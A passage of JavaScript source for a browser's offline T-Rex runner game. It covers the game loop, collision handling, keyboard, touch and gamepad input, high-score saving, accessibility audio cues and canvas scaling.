        this.setArcadeModeContainerScale();
      }
    }

    // Redraw the elements back onto the canvas.
    if (this.canvas) {
      this.canvas.width = this.dimensions.WIDTH;
      this.canvas.height = this.dimensions.HEIGHT;

      Runner.updateCanvasScaling(this.canvas);

      this.distanceMeter.calcXPos(this.dimensions.WIDTH);
      this.clearCanvas();
      this.horizon.update(0, 0, true);
      this.tRex.update(0);

      // Outer container and distance meter.
      if (this.playing || this.crashed || this.paused) {
        this.containerEl.style.width = this.dimensions.WIDTH + 'px';
        this.containerEl.style.height = this.dimensions.HEIGHT + 'px';
        this.distanceMeter.update(0, Math.ceil(this.distanceRan));
        this.stop();
      } else {
        this.tRex.draw(0, 0);
      }

      // Game over panel.
      if (this.crashed && this.gameOverPanel) {
        this.gameOverPanel.updateDimensions(this.dimensions.WIDTH);
        this.gameOverPanel.draw(this.altGameModeActive, this.tRex);
      }
    }
  },

  /**
   * Play the game intro.
   * Canvas container width expands out to the full width.
   */
  playIntro() {
    if (!this.activated && !this.crashed) {
      this.playingIntro = true;
      this.tRex.playingIntro = true;

      // CSS animation definition.
      const keyframes = '@-webkit-keyframes intro { ' +
            'from { width:' + Trex.config.WIDTH + 'px }' +
            'to { width: ' + this.dimensions.WIDTH + 'px }' +
          '}';
      document.styleSheets[0].insertRule(keyframes, 0);

      this.containerEl.addEventListener(Runner.events.ANIM_END,
          this.startGame.bind(this));

      this.containerEl.style.webkitAnimation = 'intro .4s ease-out 1 both';
      this.containerEl.style.width = this.dimensions.WIDTH + 'px';

      this.setPlayStatus(true);
      this.activated = true;
    } else if (this.crashed) {
      this.restart();
    }
  },


  /**
   * Update the game status to started.
   */
  startGame() {
    if (this.isArcadeMode()) {
      this.setArcadeMode();
    }
    this.toggleSpeed();
    this.runningTime = 0;
    this.playingIntro = false;
    this.tRex.playingIntro = false;
    this.containerEl.style.webkitAnimation = '';
    this.playCount++;
    this.generatedSoundFx.background();
    announcePhrase(getA11yString(A11Y_STRINGS.started));

    if (Runner.audioCues) {
      this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
    }

    // Handle tabbing off the page. Pause the current game.
    document.addEventListener(Runner.events.VISIBILITY,
          this.onVisibilityChange.bind(this));

    window.addEventListener(Runner.events.BLUR,
          this.onVisibilityChange.bind(this));

    window.addEventListener(Runner.events.FOCUS,
          this.onVisibilityChange.bind(this));
  },

  clearCanvas() {
    this.canvasCtx.clearRect(0, 0, this.dimensions.WIDTH,
        this.dimensions.HEIGHT);
  },

  /**
   * Checks whether the canvas area is in the viewport of the browser
   * through the current scroll position.
   * @return boolean.
   */
  isCanvasInView() {
    return this.containerEl.getBoundingClientRect().top >
        Runner.config.CANVAS_IN_VIEW_OFFSET;
  },

  /**
   * Enable the alt game mode. Switching out the sprites.
   */
  enableAltGameMode() {
    Runner.imageSprite = Runner.altGameImageSprite;
    Runner.spriteDefinition = Runner.spriteDefinitionByType[Runner.gameType];

    if (IS_HIDPI) {
      this.spriteDef = Runner.spriteDefinition.HDPI;
    } else {
      this.spriteDef = Runner.spriteDefinition.LDPI;
    }

    this.altGameModeActive = true;
    this.tRex.enableAltGameMode(this.spriteDef.TREX);
    this.horizon.enableAltGameMode(this.spriteDef);
    this.generatedSoundFx.background();
  },

  /**
   * Update the game frame and schedules the next one.
   */
  update() {
    this.updatePending = false;

    const now = getTimeStamp();
    let deltaTime = now - (this.time || now);

    // Flashing when switching game modes.
    if (this.altGameModeFlashTimer < 0 || this.altGameModeFlashTimer === 0) {
      this.altGameModeFlashTimer = null;
      this.tRex.setFlashing(false);
      this.enableAltGameMode();
    } else if (this.altGameModeFlashTimer > 0) {
      this.altGameModeFlashTimer -= deltaTime;
      this.tRex.update(deltaTime);
      deltaTime = 0;
    }

    this.time = now;

    if (this.playing) {
      this.clearCanvas();

      // Additional fade in - Prevents jump when switching sprites
      if (this.altGameModeActive &&
          this.fadeInTimer <= this.config.FADE_DURATION) {
        this.fadeInTimer += deltaTime / 1000;
        this.canvasCtx.globalAlpha = this.fadeInTimer;
      } else {
        this.canvasCtx.globalAlpha = 1;
      }

      if (this.tRex.jumping) {
        this.tRex.updateJump(deltaTime);
      }

      this.runningTime += deltaTime;
      const hasObstacles = this.runningTime > this.config.CLEAR_TIME;

      // First jump triggers the intro.
      if (this.tRex.jumpCount === 1 && !this.playingIntro) {
        this.playIntro();
      }

      // The horizon doesn't move until the intro is over.
      if (this.playingIntro) {
        this.horizon.update(0, this.currentSpeed, hasObstacles);
      } else if (!this.crashed) {
        const showNightMode = this.isDarkMode ^ this.inverted;
        deltaTime = !this.activated ? 0 : deltaTime;
        this.horizon.update(
            deltaTime, this.currentSpeed, hasObstacles, showNightMode);
      }

      // Check for collisions.
      let collision = hasObstacles &&
          checkForCollision(this.horizon.obstacles[0], this.tRex);

      // For a11y, audio cues.
      if (Runner.audioCues && hasObstacles) {
        const jumpObstacle =
            this.horizon.obstacles[0].typeConfig.type != 'COLLECTABLE';

        if (!this.horizon.obstacles[0].jumpAlerted) {
          const threshold = Runner.isMobileMouseInput ?
              Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y :
              Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD;
          const adjProximityThreshold = threshold +
              (threshold * Math.log10(this.currentSpeed / Runner.config.SPEED));

          if (this.horizon.obstacles[0].xPos < adjProximityThreshold) {
            if (jumpObstacle) {
              this.generatedSoundFx.jump();
            }
            this.horizon.obstacles[0].jumpAlerted = true;
          }
        }
      }

      // Activated alt game mode.
      if (Runner.isAltGameModeEnabled() && collision &&
          this.horizon.obstacles[0].typeConfig.type == 'COLLECTABLE') {
        this.horizon.removeFirstObstacle();
        this.tRex.setFlashing(true);
        collision = false;
        this.altGameModeFlashTimer = this.config.FLASH_DURATION;
        this.runningTime = 0;
        this.generatedSoundFx.collect();
      }

      if (!collision) {
        this.distanceRan += this.currentSpeed * deltaTime / this.msPerFrame;

        if (this.currentSpeed < this.config.MAX_SPEED) {
          this.currentSpeed += this.config.ACCELERATION;
        }
      } else {
        this.gameOver();
      }

      const playAchievementSound = this.distanceMeter.update(deltaTime,
          Math.ceil(this.distanceRan));

      if (!Runner.audioCues && playAchievementSound) {
        this.playSound(this.soundFx.SCORE);
      }

      // Night mode.
      if (!Runner.isAltGameModeEnabled()) {
        if (this.invertTimer > this.config.INVERT_FADE_DURATION) {
          this.invertTimer = 0;
          this.invertTrigger = false;
          this.invert(false);
        } else if (this.invertTimer) {
          this.invertTimer += deltaTime;
        } else {
          const actualDistance =
              this.distanceMeter.getActualDistance(Math.ceil(this.distanceRan));

          if (actualDistance > 0) {
            this.invertTrigger =
                !(actualDistance % this.config.INVERT_DISTANCE);

            if (this.invertTrigger && this.invertTimer === 0) {
              this.invertTimer += deltaTime;
              this.invert(false);
            }
          }
        }
      }
    }

    if (this.playing || (!this.activated &&
        this.tRex.blinkCount < Runner.config.MAX_BLINK_COUNT)) {
      this.tRex.update(deltaTime);
      this.scheduleNextUpdate();
    }
  },

  /**
   * Event handler.
   * @param {Event} e
   */
  handleEvent(e) {
    return (function(evtType, events) {
      switch (evtType) {
        case events.KEYDOWN:
        case events.TOUCHSTART:
        case events.POINTERDOWN:
          this.onKeyDown(e);
          break;
        case events.KEYUP:
        case events.TOUCHEND:
        case events.POINTERUP:
          this.onKeyUp(e);
          break;
        case events.GAMEPADCONNECTED:
          this.onGamepadConnected(e);
          break;
      }
    }.bind(this))(e.type, Runner.events);
  },

  /**
   * Initialize audio cues if activated by focus on the canvas element.
   * @param {Event} e
   */
  handleCanvasKeyPress(e) {
    if (!this.activated && !Runner.audioCues) {
      this.toggleSpeed();
      Runner.audioCues = true;
      this.generatedSoundFx.init();
      Runner.generatedSoundFx = this.generatedSoundFx;
      Runner.config.CLEAR_TIME *= 1.2;
    } else if (e.keyCode && Runner.keycodes.JUMP[e.keyCode]) {
      this.onKeyDown(e);
    }
  },

  /**
   * Prevent space key press from scrolling.
   * @param {Event} e
   */
  preventScrolling(e) {
    if (e.keyCode === 32) {
      e.preventDefault();
    }
  },

  /**
   * Toggle speed setting if toggle is shown.
   */
  toggleSpeed() {
    if (Runner.audioCues) {
      const speedChange = Runner.slowDown != this.slowSpeedCheckbox.checked;

      if (speedChange) {
        Runner.slowDown = this.slowSpeedCheckbox.checked;
        const updatedConfig =
            Runner.slowDown ? Runner.slowConfig : Runner.normalConfig;

        Runner.config = Object.assign(Runner.config, updatedConfig);
        this.currentSpeed = updatedConfig.SPEED;
        this.tRex.enableSlowConfig();
        this.horizon.adjustObstacleSpeed();
      }
      if (this.playing) {
        this.disableSpeedToggle(true);
      }
    }
  },

  /**
   * Show the speed toggle.
   * From focus event or when audio cues are activated.
   * @param {Event=} e
   */
  showSpeedToggle(e) {
    const isFocusEvent = e && e.type == 'focus';
    if (Runner.audioCues || isFocusEvent) {
      this.slowSpeedCheckboxLabel.classList.toggle(
          HIDDEN_CLASS, isFocusEvent ? false : !this.crashed);
    }
  },

  /**
   * Disable the speed toggle.
   * @param {boolean} disable
   */
  disableSpeedToggle(disable) {
    if (disable) {
      this.slowSpeedCheckbox.setAttribute('disabled', 'disabled');
    } else {
      this.slowSpeedCheckbox.removeAttribute('disabled');
    }
  },

  /**
   * Bind relevant key / mouse / touch listeners.
   */
  startListening() {
    // A11y keyboard / screen reader activation.
    this.containerEl.addEventListener(
        Runner.events.KEYDOWN, this.handleCanvasKeyPress.bind(this));
    if (!IS_MOBILE) {
      this.containerEl.addEventListener(
          Runner.events.FOCUS, this.showSpeedToggle.bind(this));
    }
    this.canvas.addEventListener(
        Runner.events.KEYDOWN, this.preventScrolling.bind(this));
    this.canvas.addEventListener(
        Runner.events.KEYUP, this.preventScrolling.bind(this));

    // Keys.
    document.addEventListener(Runner.events.KEYDOWN, this);
    document.addEventListener(Runner.events.KEYUP, this);

    // Touch / pointer.
    this.containerEl.addEventListener(Runner.events.TOUCHSTART, this);
    document.addEventListener(Runner.events.POINTERDOWN, this);
    document.addEventListener(Runner.events.POINTERUP, this);

    if (this.isArcadeMode()) {
      // Gamepad
      window.addEventListener(Runner.events.GAMEPADCONNECTED, this);
    }
  },

  /**
   * Remove all listeners.
   */
  stopListening() {
    document.removeEventListener(Runner.events.KEYDOWN, this);
    document.removeEventListener(Runner.events.KEYUP, this);

    if (this.touchController) {
      this.touchController.removeEventListener(Runner.events.TOUCHSTART, this);
      this.touchController.removeEventListener(Runner.events.TOUCHEND, this);
    }

    this.containerEl.removeEventListener(Runner.events.TOUCHSTART, this);
    document.removeEventListener(Runner.events.POINTERDOWN, this);
    document.removeEventListener(Runner.events.POINTERUP, this);

    if (this.isArcadeMode()) {
      window.removeEventListener(Runner.events.GAMEPADCONNECTED, this);
    }
  },

  /**
   * Process keydown.
   * @param {Event} e
   */
  onKeyDown(e) {
    // Prevent native page scrolling whilst tapping on mobile.
    if (IS_MOBILE && this.playing) {
      e.preventDefault();
    }

    if (this.isCanvasInView()) {
      // Allow toggling of speed toggle.
      if (Runner.keycodes.JUMP[e.keyCode] &&
          e.target == this.slowSpeedCheckbox) {
        return;
      }

      if (!this.crashed && !this.paused) {
        // For a11y, screen reader activation.
        const isMobileMouseInput = IS_MOBILE &&
                e.type === Runner.events.POINTERDOWN &&
                e.pointerType == 'mouse' && e.target == this.containerEl ||
            (IS_IOS && e.pointerType == 'touch' &&
             document.activeElement == this.containerEl);

        if (Runner.keycodes.JUMP[e.keyCode] ||
            e.type === Runner.events.TOUCHSTART || isMobileMouseInput ||
            (Runner.keycodes.DUCK[e.keyCode] && this.altGameModeActive)) {
          e.preventDefault();
          // Starting the game for the first time.
          if (!this.playing) {
            // Started by touch so create a touch controller.
            if (!this.touchController && e.type === Runner.events.TOUCHSTART) {
              this.createTouchController();
            }

            if (isMobileMouseInput) {
              this.handleCanvasKeyPress(e);
            }
            this.loadSounds();
            this.setPlayStatus(true);
            this.update();
            if (window.errorPageController) {
              errorPageController.trackEasterEgg();
            }
          }
          // Start jump.
          if (!this.tRex.jumping && !this.tRex.ducking) {
            if (Runner.audioCues) {
              this.generatedSoundFx.cancelFootSteps();
            } else {
              this.playSound(this.soundFx.BUTTON_PRESS);
            }
            this.tRex.startJump(this.currentSpeed);
          }
          // Ducking is disabled on alt game modes.
        } else if (
            !this.altGameModeActive && this.playing &&
            Runner.keycodes.DUCK[e.keyCode]) {
          e.preventDefault();
          if (this.tRex.jumping) {
            // Speed drop, activated only when jump key is not pressed.
            this.tRex.setSpeedDrop();
          } else if (!this.tRex.jumping && !this.tRex.ducking) {
            // Duck.
            this.tRex.setDuck(true);
          }
        }
      }
    }
  },

  /**
   * Process key up.
   * @param {Event} e
   */
  onKeyUp(e) {
    const keyCode = String(e.keyCode);
    const isjumpKey = Runner.keycodes.JUMP[keyCode] ||
        e.type === Runner.events.TOUCHEND || e.type === Runner.events.POINTERUP;

    if (this.isRunning() && isjumpKey) {
      this.tRex.endJump();
    } else if (Runner.keycodes.DUCK[keyCode]) {
      this.tRex.speedDrop = false;
      this.tRex.setDuck(false);
    } else if (this.crashed) {
      // Check that enough time has elapsed before allowing jump key to restart.
      const deltaTime = getTimeStamp() - this.time;

      if (this.isCanvasInView() &&
          (Runner.keycodes.RESTART[keyCode] || this.isLeftClickOnCanvas(e) ||
          (deltaTime >= this.config.GAMEOVER_CLEAR_TIME &&
          Runner.keycodes.JUMP[keyCode]))) {
        this.handleGameOverClicks(e);
      }
    } else if (this.paused && isjumpKey) {
      // Reset the jump state
      this.tRex.reset();
      this.play();
    }
  },

  /**
   * Process gamepad connected event.
   * @param {Event} e
   */
  onGamepadConnected(e) {
    if (!this.pollingGamepads) {
      this.pollGamepadState();
    }
  },

  /**
   * rAF loop for gamepad polling.
   */
  pollGamepadState() {
    const gamepads = navigator.getGamepads();
    this.pollActiveGamepad(gamepads);

    this.pollingGamepads = true;
    requestAnimationFrame(this.pollGamepadState.bind(this));
  },

  /**
   * Polls for a gamepad with the jump button pressed. If one is found this
   * becomes the "active" gamepad and all others are ignored.
   * @param {!Array<Gamepad>} gamepads
   */
  pollForActiveGamepad(gamepads) {
    for (let i = 0; i < gamepads.length; ++i) {
      if (gamepads[i] && gamepads[i].buttons.length > 0 &&
          gamepads[i].buttons[0].pressed) {
        this.gamepadIndex = i;
        this.pollActiveGamepad(gamepads);
        return;
      }
    }
  },

  /**
   * Polls the chosen gamepad for button presses and generates KeyboardEvents
   * to integrate with the rest of the game logic.
   * @param {!Array<Gamepad>} gamepads
   */
  pollActiveGamepad(gamepads) {
    if (this.gamepadIndex === undefined) {
      this.pollForActiveGamepad(gamepads);
      return;
    }

    const gamepad = gamepads[this.gamepadIndex];
    if (!gamepad) {
      this.gamepadIndex = undefined;
      this.pollForActiveGamepad(gamepads);
      return;
    }

    // The gamepad specification defines the typical mapping of physical buttons
    // to button indicies: https://w3c.github.io/gamepad/#remapping
    this.pollGamepadButton(gamepad, 0, 38);  // Jump
    if (gamepad.buttons.length >= 2) {
      this.pollGamepadButton(gamepad, 1, 40);  // Duck
    }
    if (gamepad.buttons.length >= 10) {
      this.pollGamepadButton(gamepad, 9, 13);  // Restart
    }

    this.previousGamepad = gamepad;
  },

  /**
   * Generates a key event based on a gamepad button.
   * @param {!Gamepad} gamepad
   * @param {number} buttonIndex
   * @param {number} keyCode
   */
  pollGamepadButton(gamepad, buttonIndex, keyCode) {
    const state = gamepad.buttons[buttonIndex].pressed;
    let previousState = false;
    if (this.previousGamepad) {
      previousState = this.previousGamepad.buttons[buttonIndex].pressed;
    }
    // Generate key events on the rising and falling edge of a button press.
    if (state !== previousState) {
      const e = new KeyboardEvent(state ? Runner.events.KEYDOWN
                                      : Runner.events.KEYUP,
                                { keyCode: keyCode });
      document.dispatchEvent(e);
    }
  },

  /**
   * Handle interactions on the game over screen state.
   * A user is able to tap the high score twice to reset it.
   * @param {Event} e
   */
  handleGameOverClicks(e) {
    if (e.target != this.slowSpeedCheckbox) {
      e.preventDefault();
      if (this.distanceMeter.hasClickedOnHighScore(e) && this.highestScore) {
        if (this.distanceMeter.isHighScoreFlashing()) {
          // Subsequent click, reset the high score.
          this.saveHighScore(0, true);
          this.distanceMeter.resetHighScore();
        } else {
          // First click, flash the high score.
          this.distanceMeter.startHighScoreFlashing();
        }
      } else {
        this.distanceMeter.cancelHighScoreFlashing();
        this.restart();
      }
    }
  },

  /**
   * Returns whether the event was a left click on canvas.
   * On Windows right click is registered as a click.
   * @param {Event} e
   * @return {boolean}
   */
  isLeftClickOnCanvas(e) {
    return e.button != null && e.button < 2 &&
        e.type === Runner.events.POINTERUP &&
        (e.target === this.canvas ||
         (IS_MOBILE && Runner.audioCues && e.target === this.containerEl));
  },

  /**
   * RequestAnimationFrame wrapper.
   */
  scheduleNextUpdate() {
    if (!this.updatePending) {
      this.updatePending = true;
      this.raqId = requestAnimationFrame(this.update.bind(this));
    }
  },

  /**
   * Whether the game is running.
   * @return {boolean}
   */
  isRunning() {
    return !!this.raqId;
  },

  /**
   * Set the initial high score as stored in the user's profile.
   * @param {number} highScore
   */
  initializeHighScore(highScore) {
    this.syncHighestScore = true;
    highScore = Math.ceil(highScore);
    if (highScore < this.highestScore) {
      if (window.errorPageController) {
        errorPageController.updateEasterEggHighScore(this.highestScore);
      }
      return;
    }
    this.highestScore = highScore;
    this.distanceMeter.setHighScore(this.highestScore);
  },

  /**
   * Sets the current high score and saves to the profile if available.
   * @param {number} distanceRan Total distance ran.
   * @param {boolean=} opt_resetScore Whether to reset the score.
   */
  saveHighScore(distanceRan, opt_resetScore) {
    this.highestScore = Math.ceil(distanceRan);
    this.distanceMeter.setHighScore(this.highestScore);

    // Store the new high score in the profile.
    if (this.syncHighestScore && window.errorPageController) {
      if (opt_resetScore) {
        errorPageController.resetEasterEggHighScore();
      } else {
        errorPageController.updateEasterEggHighScore(this.highestScore);
      }
    }
  },

  /**
   * Game over state.
   */
  gameOver() {
    this.playSound(this.soundFx.HIT);
    vibrate(200);

    this.stop();
    this.crashed = true;
    this.distanceMeter.achievement = false;

    this.tRex.update(100, Trex.status.CRASHED);

    // Game over panel.
    if (!this.gameOverPanel) {
      const origSpriteDef = IS_HIDPI ?
          Runner.spriteDefinitionByType.original.HDPI :
          Runner.spriteDefinitionByType.original.LDPI;

      if (this.canvas) {
        if (Runner.isAltGameModeEnabled) {
          this.gameOverPanel = new GameOverPanel(
              this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
              this.dimensions, origSpriteDef.ALT_GAME_END,
              this.altGameModeActive);
        } else {
          this.gameOverPanel = new GameOverPanel(
              this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
              this.dimensions);
        }
      }
    }

    this.gameOverPanel.draw(this.altGameModeActive, this.tRex);

    // Update the high score.
    if (this.distanceRan > this.highestScore) {
      this.saveHighScore(this.distanceRan);
    }

    // Reset the time clock.
    this.time = getTimeStamp();

    if (Runner.audioCues) {
      this.generatedSoundFx.stopAll();
      announcePhrase(
          getA11yString(A11Y_STRINGS.gameOver)
              .replace(
                  '$1',
                  this.distanceMeter.getActualDistance(this.distanceRan)
                      .toString()) +
          ' ' +
          getA11yString(A11Y_STRINGS.highScore)
              .replace(
                  '$1',

                  this.distanceMeter.getActualDistance(this.highestScore)
                      .toString()));
      this.containerEl.setAttribute(
          'title', getA11yString(A11Y_STRINGS.ariaLabel));
    }
    this.showSpeedToggle();
    this.disableSpeedToggle(false);
  },

  stop() {
    this.setPlayStatus(false);
    this.paused = true;
    cancelAnimationFrame(this.raqId);
    this.raqId = 0;
    this.generatedSoundFx.stopAll();
  },

  play() {
    if (!this.crashed) {
      this.setPlayStatus(true);
      this.paused = false;
      this.tRex.update(0, Trex.status.RUNNING);
      this.time = getTimeStamp();
      this.update();
      this.generatedSoundFx.background();
    }
  },

  restart() {
    if (!this.raqId) {
      this.playCount++;
      this.runningTime = 0;
      this.setPlayStatus(true);
      this.toggleSpeed();
      this.paused = false;
      this.crashed = false;
      this.distanceRan = 0;
      this.setSpeed(this.config.SPEED);
      this.time = getTimeStamp();
      this.containerEl.classList.remove(Runner.classes.CRASHED);
      this.clearCanvas();
      this.distanceMeter.reset();
      this.horizon.reset();
      this.tRex.reset();
      this.playSound(this.soundFx.BUTTON_PRESS);
      this.invert(true);
      this.flashTimer = null;
      this.update();
      this.gameOverPanel.reset();
      this.generatedSoundFx.background();
      this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
      announcePhrase(getA11yString(A11Y_STRINGS.started));
    }
  },

  setPlayStatus(isPlaying) {
    if (this.touchController) {
      this.touchController.classList.toggle(HIDDEN_CLASS, !isPlaying);
    }
    this.playing = isPlaying;
  },

  /**
   * Whether the game should go into arcade mode.
   * @return {boolean}
   */
  isArcadeMode() {
    // In RTL languages the title is wrapped with the left to right mark
    // control characters &#x202A; and &#x202C but are invisible.
    return IS_RTL ? document.title.indexOf(ARCADE_MODE_URL) == 1 :
                    document.title === ARCADE_MODE_URL;
  },

  /**
   * Hides offline messaging for a fullscreen game only experience.
   */
  setArcadeMode() {
    document.body.classList.add(Runner.classes.ARCADE_MODE);
    this.setArcadeModeContainerScale();
  },

  /**
   * Sets the scaling for arcade mode.
   */
  setArcadeModeContainerScale() {
    const windowHeight = window.innerHeight;
    const scaleHeight = windowHeight / this.dimensions.HEIGHT;
    const scaleWidth = window.innerWidth / this.dimensions.WIDTH;
    const scale = Math.max(1, Math.min(scaleHeight, scaleWidth));
    const scaledCanvasHeight = this.dimensions.HEIGHT * scale;
    // Positions the game container at 10% of the available vertical window
    // height minus the game container height.
    const translateY = Math.ceil(Math.max(0, (windowHeight - scaledCanvasHeight -
        Runner.config.ARCADE_MODE_INITIAL_TOP_POSITION) *
        Runner.config.ARCADE_MODE_TOP_POSITION_PERCENT)) *
        window.devicePixelRatio;

    const cssScale = IS_RTL ? -scale + ',' + scale : scale;
    this.containerEl.style.transform =
        'scale(' + cssScale + ') translateY(' + translateY + 'px)';
  },

  /**
   * Pause the game if the tab is not in focus.
   */
  onVisibilityChange(e) {
    if (document.hidden || document.webkitHidden || e.type === 'blur' ||
        document.visibilityState !== 'visible') {
      this.stop();
    } else if (!this.crashed) {
      this.tRex.reset();
      this.play();
    }
  },

  /**
   * Play a sound.
   * @param {AudioBuffer} soundBuffer
   */
  playSound(soundBuffer) {
    if (soundBuffer) {
      const sourceNode = this.audioContext.createBufferSource();
      sourceNode.buffer = soundBuffer;
      sourceNode.connect(this.audioContext.destination);
      sourceNode.start(0);
    }
  },

  /**
   * Inverts the current page / canvas colors.
   * @param {boolean} reset Whether to reset colors.
   */
  invert(reset) {
    const htmlEl = document.firstElementChild;

    if (reset) {
      htmlEl.classList.toggle(Runner.classes.INVERTED,
          false);
      this.invertTimer = 0;
      this.inverted = false;
    } else {
      this.inverted = htmlEl.classList.toggle(
          Runner.classes.INVERTED, this.invertTrigger);
    }
  },
};


/**
 * Updates the canvas size taking into
 * account the backing store pixel ratio and
 * the device pixel ratio.
 *
 * See article by Paul Lewis:
 * http://www.html5rocks.com/en/tutorials/canvas/hidpi/
 *
 * @param {HTMLCanvasElement} canvas
 * @param {number=} opt_width
 * @param {number=} opt_height
 * @return {boolean} Whether the canvas was scaled.
 */
Runner.updateCanvasScaling = function(canvas, opt_width, opt_height) {
  const context =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));

  // Query the various pixel ratios
  const devicePixelRatio = Math.floor(window.devicePixelRatio) || 1;
  /** @suppress {missingProperties} */
  const backingStoreRatio =
      Math.floor(context.webkitBackingStorePixelRatio) || 1;
  const ratio = devicePixelRatio / backingStoreRatio;

  // Upscale the canvas if the two ratios don't match
  if (devicePixelRatio !== backingStoreRatio) {
    const oldWidth = opt_width || canvas.width;
    const oldHeight = opt_height || canvas.height;

    canvas.width = oldWidth * ratio;
    canvas.height = oldHeight * ratio;

    canvas.style.width = oldWidth + 'px';
    canvas.style.height = oldHeight + 'px';

    // Scale the context to counter the fact that we've manually scaled
    // our canvas element.
    context.scale(ratio, ratio);
    return true;
  } else if (devicePixelRatio === 1) {
    // Reset the canvas width / height. Fixes scaling bug when the page is
    // zoomed and the devicePixelRatio changes accordingly.
    canvas.style.width = canvas.width + 'px';
    canvas.style.height = canvas.height + 'px';
  }
  return false;
};


/**
 * Whether events are enabled.
 * @return {boolean}
 */
Runner.isAltGameModeEnabled = function() {
  return loadTimeData && loadTimeData.valueExists('enableAltGameMode');
};


/**
 * Generated sound FX class for audio cues.
 * @constructor
 */
function GeneratedSoundFx() {
  this.audioCues = false;
  this.context = null;
  this.panner = null;
}

GeneratedSoundFx.prototype = {
  init() {
    this.audioCues = true;
    if (!this.context) {
      // iOS only supports the webkit version.
      this.context = window.webkitAudioContext ? new webkitAudioContext() :
                                                 new AudioContext();
      if (IS_IOS) {
        this.context.onstatechange = (function() {
                                       if (this.context.state != 'running') {
                                         this.context.resume();
                                       }
                                     }).bind(this);
        this.context.resume();
      }
      this.panner = this.context.createStereoPanner ?
          this.context.createStereoPanner() :
          null;
    }
  },

  stopAll() {
    this.cancelFootSteps();
  },

  /**
   * Play oscillators at certain frequency and for a certain time.
   * @param {number} frequency
   * @param {number} startTime
   * @param {number} duration
   * @param {?number=} opt_vol
   * @param {number=} opt_pan
   */
  playNote(frequency, startTime, duration, opt_vol, opt_pan) {
    const osc1 = this.context.createOscillator();
    const osc2 = this.context.createOscillator();
    const volume = this.context.createGain();

    // Set oscillator wave type
    osc1.type = 'triangle';
    osc2.type = 'triangle';
    volume.gain.value = 0.1;

    // Set up node routing
    if (this.panner) {
      this.panner.pan.value = opt_pan || 0;
      osc1.connect(volume).connect(this.panner);
      osc2.connect(volume).connect(this.panner);
      this.panner.connect(this.context.destination);
    } else {
      osc1.connect(volume);
      osc2.connect(volume);
      volume.connect(this.context.destination);
    }

    // Detune oscillators for chorus effect
    osc1.frequency.value = frequency + 1;
    osc2.frequency.value = frequency - 2;

    // Fade out
    volume.gain.setValueAtTime(opt_vol || 0.01, startTime + duration - 0.05);
    volume.gain.linearRampToValueAtTime(0.00001, startTime + duration);

    // Start oscillators
    osc1.start(startTime);
    osc2.start(startTime);
    // Stop oscillators
    osc1.stop(startTime + duration);
    osc2.stop(startTime + duration);
  },

  background() {
    if (this.audioCues) {
      const now = this.context.currentTime;
      this.playNote(493.883, now, 0.116);
      this.playNote(659.255, now + 0.116, 0.232);
      this.loopFootSteps();
    }
  },

  loopFootSteps() {
    if (this.audioCues && !this.bgSoundIntervalId) {
      this.bgSoundIntervalId = setInterval(function() {
        this.playNote(73.42, this.context.currentTime, 0.05, 0.16);
        this.playNote(69.30, this.context.currentTime + 0.116, 0.116, 0.16);
      }.bind(this), 280);
    }
  },

  cancelFootSteps() {
    if (this.audioCues && this.bgSoundIntervalId) {
      clearInterval(this.bgSoundIntervalId);
      this.bgSoundIntervalId = null;
      this.playNote(103.83, this.context.currentTime, 0.232, 0.02);
      this.playNote(116.54, this.context.currentTime + 0.116, 0.232, 0.02);
    }
  },

  collect() {
    if (this.audioCues) {
      this.cancelFootSteps();
      const now = this.context.currentTime;
      this.playNote(830.61, now, 0.116);
      this.playNote(1318.51, now + 0.116, 0.232);
    }
  },

  jump() {
    if (this.audioCues) {
      const now = this.context.currentTime;
      this.playNote(659.25, now, 0.116, 0.3, -0.6);
      this.playNote(880, now + 0.116, 0.232, 0.3, -0.6);
    }
  },
};


/**
 * Speak a phrase using Speech Synthesis API for a11y.
 * @param {string} phrase Sentence to speak.
 */
function speakPhrase(phrase) {
  if ('speechSynthesis' in window) {
    const msg = new SpeechSynthesisUtterance(phrase);
    const voices = window.speechSynthesis.getVoices();
    msg.text = phrase;
    speechSynthesis.speak(msg);
  }
}


/**
 * For screen readers make an announcement to the live region.
 * @param {string} phrase Sentence to speak.
 */
function announcePhrase(phrase) {
  if (Runner.a11yStatusEl) {
    Runner.a11yStatusEl.textContent = '';
    Runner.a11yStatusEl.textContent = phrase;
  }
}


/**
 * Returns a string from loadTimeData data object.
 * @param {string} stringName
 * @return {string}
 */
function getA11yString(stringName) {
  return loadTimeData && loadTimeData.valueExists(stringName) ?
      loadTimeData.getString(stringName) :
      '';
}


/**
 * Get random number.
 * @param {number} min
 * @param {number} max
 */
function getRandomNum(min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
}


/**
 * Vibrate on mobile devices.
 * @param {number} duration Duration of the vibration in milliseconds.
 */
function vibrate(duration) {
  if (IS_MOBILE && window.navigator.vibrate) {
    window.navigator.vibrate(duration);
  }
}


/**
 * Create canvas element.
 * @param {Element} container Element to append canvas to.
 * @param {number} width
 * @param {number} height
 * @param {string=} opt_classname
 * @return {HTMLCanvasElement}
 */
function createCanvas(container, width, height, opt_classname) {
  const canvas =
      /** @type {!HTMLCanvasElement} */ (document.createElement('canvas'));
  canvas.className = opt_classname ? Runner.classes.CANVAS + ' ' +
      opt_classname : Runner.classes.CANVAS;
  canvas.width = width;
  canvas.height = height;
  container.appendChild(canvas);

  return canvas;
}


/**
 * Decodes the base 64 audio to ArrayBuffer used by Web Audio.
 * @param {string} base64String
 */
function decodeBase64ToArrayBuffer(base64String) {
  const len = (base64String.length / 4) * 3;
  const str = atob(base64String);
  const arrayBuffer = new ArrayBuffer(len);
  const bytes = new Uint8Array(arrayBuffer);

  for (let i = 0; i < len; i++) {
    bytes[i] = str.charCodeAt(i);
  }
  return bytes.buffer;
}


/**
 * Return the current timestamp.
 * @return {number}
 */
function getTimeStamp() {
  return IS_IOS ? new Date().getTime() : performance.now();
}


//******************************************************************************


/**
 * Game over panel.
 * @param {!HTMLCanvasElement} canvas
 * @param {Object} textImgPos
 * @param {Object} restartImgPos
 * @param {!Object} dimensions Canvas dimensions.
 * @param {Object=} opt_altGameEndImgPos
